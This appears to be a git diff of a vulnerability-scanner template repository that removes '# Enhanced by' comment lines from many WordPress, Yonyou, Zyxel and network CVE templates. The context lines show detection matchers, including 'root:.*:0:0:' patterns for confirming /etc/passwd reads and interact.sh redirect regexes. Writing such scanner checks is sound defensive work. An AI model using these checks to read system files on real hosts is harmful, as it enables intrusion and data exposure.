a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml +++ b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -49,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml index 0a3db3467d..28580e517c 100644 --- a/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -25,4 +25,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/04/13 + diff --git a/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml index 6fad37e466..7e2f572ffa 100644 --- a/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml @@ -25,4 +25,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# Enhanced by mp on 2022/04/13 + diff --git a/http/vulnerabilities/wordpress/sassy-social-share.yaml b/http/vulnerabilities/wordpress/sassy-social-share.yaml index 2d28872b83..9567af61d4 100644 --- a/http/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/http/vulnerabilities/wordpress/sassy-social-share.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml index 0d5d9e9817..a29ca90515 100644 --- a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -59,4 +59,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/shortcode-lfi.yaml b/http/vulnerabilities/wordpress/shortcode-lfi.yaml index 2b857eb64d..366b161abf 100644 --- a/http/vulnerabilities/wordpress/shortcode-lfi.yaml +++ b/http/vulnerabilities/wordpress/shortcode-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml index 44ed1d979c..2d70ca1cbe 100644 --- a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml +++ b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 9b2be56c07..3c32330c34 100644 --- a/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -27,4 +27,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index d469f6389d..5b635eed7d 100644 --- a/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -26,4 +26,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml index b8c58bcc63..b3dc76590c 100644 --- a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml +++ b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml @@ -50,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index fa62ee81c9..01d0668ef3 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -52,4 +52,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml index 256b999a4f..f3cdc2ce57 100644 --- a/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml @@ -27,4 +27,4 @@ http: status: - 200 -# Enhanced by mp on 2022/10/12 + diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index 3c3fbdfe9d..e848120781 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index dde9c91af2..c04aee71da 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index 0e0743f71b..f0c1a8753f 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index ac88813ab8..b992da43ef 100644 --- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -48,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml b/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml index 7a6cc3d5da..a134e8537c 100644 --- a/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/13 + diff --git a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml index f424f25fb2..9b52ca481f 100644 --- a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml @@ -50,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml index e8da4f2926..fbaa2ffaf1 100644 --- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml b/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml index aa7a2b87b4..8fb9468396 100644 --- a/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/07 + diff --git a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml index 595e3281dd..075eeea182 100644 --- a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml @@ -50,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 27a9c8b094..6eb6b139ba 100644 --- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml index a405aeff47..8eaf93a070 100644 --- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml index 80e5593e4a..7929fdc663 100644 --- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml index 920c34da56..2f23baadbb 100644 --- a/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml @@ -27,4 +27,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml index 04efc4202f..791d9e2105 100644 --- a/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml @@ -30,4 +30,4 @@ http: status: - 301 -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml index 568fea037b..37ecc1c771 100644 --- a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -50,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml b/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml index 7e2efede87..e9d95c435b 100644 --- a/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml index f0b1c013a8..ba79220f21 100644 --- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index f12a53dfa9..53e89d0b93 100644 --- a/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 68bb349a30..8a110824a6 100644 --- a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/13 + diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml index 84cc78a38b..cd7b3505be 100644 --- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index bb7a4cbb89..91878715e4 100644 --- a/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index 4b08614c52..88aa0dea82 100644 --- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml index e3cf87c226..1a8067f20b 100644 --- a/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml @@ -22,4 +22,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml index b988f94ef9..0912d896d5 100644 --- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml index dd36330327..3492b5dd0c 100644 --- a/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml @@ -30,4 +30,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/19 + diff --git a/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml b/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml index 4cae0d2789..b11c8751d0 100644 --- a/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml @@ -22,4 +22,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 7672983d86..6023105c21 100644 --- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml index a1df471eea..ee4639ce1a 100644 --- a/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml b/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml index df39e3f054..d4e3693096 100644 --- a/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml @@ -30,4 +30,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml index 14be2265c3..0ec7577e4c 100644 --- a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml b/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml index 8df68a755b..0449644d65 100644 --- a/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml @@ -26,4 +26,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-vault-lfi.yaml b/http/vulnerabilities/wordpress/wp-vault-lfi.yaml index 8010dcc94b..343531c18b 100644 --- a/http/vulnerabilities/wordpress/wp-vault-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-vault-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml index b7336061fa..a615db3762 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 0ec7a4a2fc..51cc5b33a3 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/13 + diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index be2714f496..192566030d 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by cs on 2022/10/03 + diff --git a/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml b/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml index f544e9ef30..ddce980301 100644 --- a/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml +++ b/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml b/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml index 4d1093bb08..2c31238b14 100644 --- a/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml @@ -27,4 +27,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by md on 2022/10/19 + diff --git a/http/vulnerabilities/wordpress/wptouch-xss.yaml b/http/vulnerabilities/wordpress/wptouch-xss.yaml index b753fbda7d..8e5219efca 100644 --- a/http/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/http/vulnerabilities/wordpress/wptouch-xss.yaml @@ -55,4 +55,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/13 + diff --git a/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml b/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml index 8ead35e7b6..de32db15c0 100644 --- a/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml +++ b/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml b/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml index 19b516588c..d07a7e0b71 100644 --- a/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml +++ b/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml @@ -33,4 +33,4 @@ http: part: body condition: and -# Enhanced by mp on 2022/07/29 + diff --git a/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml index 37410e78d5..7939edfdf8 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index ee19f74a76..17bbdc5a18 100644 --- a/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2023/01/15 + diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml index 7887c784f6..99cc4611eb 100644 --- a/network/backdoor/backdoored-zte.yaml +++ b/network/backdoor/backdoored-zte.yaml @@ -38,4 +38,4 @@ tcp: regex: - '[A-Z]{1,}[0-9]{3,4}' -# Enhanced by cs on 2023/03/27 + diff --git a/network/cisco-smi-exposure.yaml b/network/cisco-smi-exposure.yaml index 11bbdef188..abfc5d7bd9 100644 --- a/network/cisco-smi-exposure.yaml +++ b/network/cisco-smi-exposure.yaml @@ -34,4 +34,4 @@ tcp: words: - "000000040000000000000003000000080000000100000000" -# Enhanced by mp on 2022/03/30 + diff --git a/network/clickhouse-unauth.yaml b/network/clickhouse-unauth.yaml index c0073de777..f03da1cfb6 100644 --- a/network/clickhouse-unauth.yaml +++ b/network/clickhouse-unauth.yaml @@ -28,4 +28,4 @@ tcp: - "UTC" condition: and -# Enhanced by mp on 2022/07/20 + diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index 3e3389fe50..1302541a0f 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -28,4 +28,4 @@ tcp: words: - "SSH-1" -# Enhanced by Chris on 2022/01/21 + diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index 10f0ef6d4c..d1bb03c6ff 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -41,4 +41,4 @@ tcp: words: - "Copy successful" -# Enhanced by mp on 2022/06/08 + diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 75fffd2442..7f771c795f 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -34,4 +34,4 @@ tcp: words: - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system -# Enhanced by mp on 2022/05/10 + diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index ec013ec86f..b0890f161b 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -38,4 +38,4 @@ tcp: words: - "Current privilege level is" -# Enhanced by mp on 2022/05/11 + diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 7c0fe2ff5c..5856379a16 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -38,4 +38,4 @@ tcp: regex: - "\\$Proxy[0-9]+" -# Enhanced by mp on 2022/04/14 + diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index c6b0a84e27..722ec1eb91 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -44,4 +44,4 @@ tcp: words: - "StreamMessageImpl cannot be cast to weblogic" -# Enhanced by mp on 2022/04/14 + diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index 9f84a77cf5..fc3d8a94ac 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -52,4 +52,4 @@ tcp: words: - "Message accepted for delivery" -# Enhanced by mp on 2022/04/29 + diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 05ef16877d..2159387311 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -61,4 +61,4 @@ tcp: words: - "123123" -# Enhanced by mp on 2022/03/07 + diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index fa7c901d54..4bfc351bf6 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -40,5 +40,5 @@ tcp: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/05/18 -# Enhanced by vibrio on 2023/05/11 + + diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index c5a8792251..4ef90d78f1 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -40,4 +40,4 @@ tcp: words: - "726f6f743a" -# Enhanced by mp on 2023/01/15 + diff --git a/network/detect-addpac-voip-gateway.yaml b/network/detect-addpac-voip-gateway.yaml index 1dac8eac85..2a3584b186 100644 --- a/network/detect-addpac-voip-gateway.yaml +++ b/network/detect-addpac-voip-gateway.yaml @@ -38,4 +38,4 @@ tcp: regex: - 'Kernel Version \d\.\d\d\.\d\d\d' -# Enhanced by md on 2023/02/06 + diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml index 0360c9321a..dbe1c9fa80 100644 --- a/network/detect-jabber-xmpp.yaml +++ b/network/detect-jabber-xmpp.yaml @@ -30,4 +30,4 @@ tcp: - "stream:error xmlns:stream" condition: or -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index ff41aa728e..ce1cfb9f7e 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -35,4 +35,4 @@ tcp: regex: - ".NET CLR ([0-9.]+)" -# Enhanced by md on 2023/03/29 + diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 9100d6fbf8..b7d60d97ff 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -34,4 +34,4 @@ tcp: - "220" condition: and -# Enhanced by md on 2023/03/29 + diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index c839ddc8ad..11a3d9da08 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -26,4 +26,4 @@ tcp: dsl: - "contains(to_lower(raw), 'gopher')" -# Enhanced by md on 2023/02/06 + diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index 1107353672..d8b9fb4854 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -36,4 +36,4 @@ tcp: - "SQLJS1D" condition: or -# Enhanced by md on 2023/03/22 + diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index f7ef836fb9..d154dcff13 100644 --- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -32,4 +32,4 @@ tcp: - "IMAP4rev1" condition: and -# Enhanced by md on 2023/03/29 + diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index a720246472..af69d7dd70 100644 --- 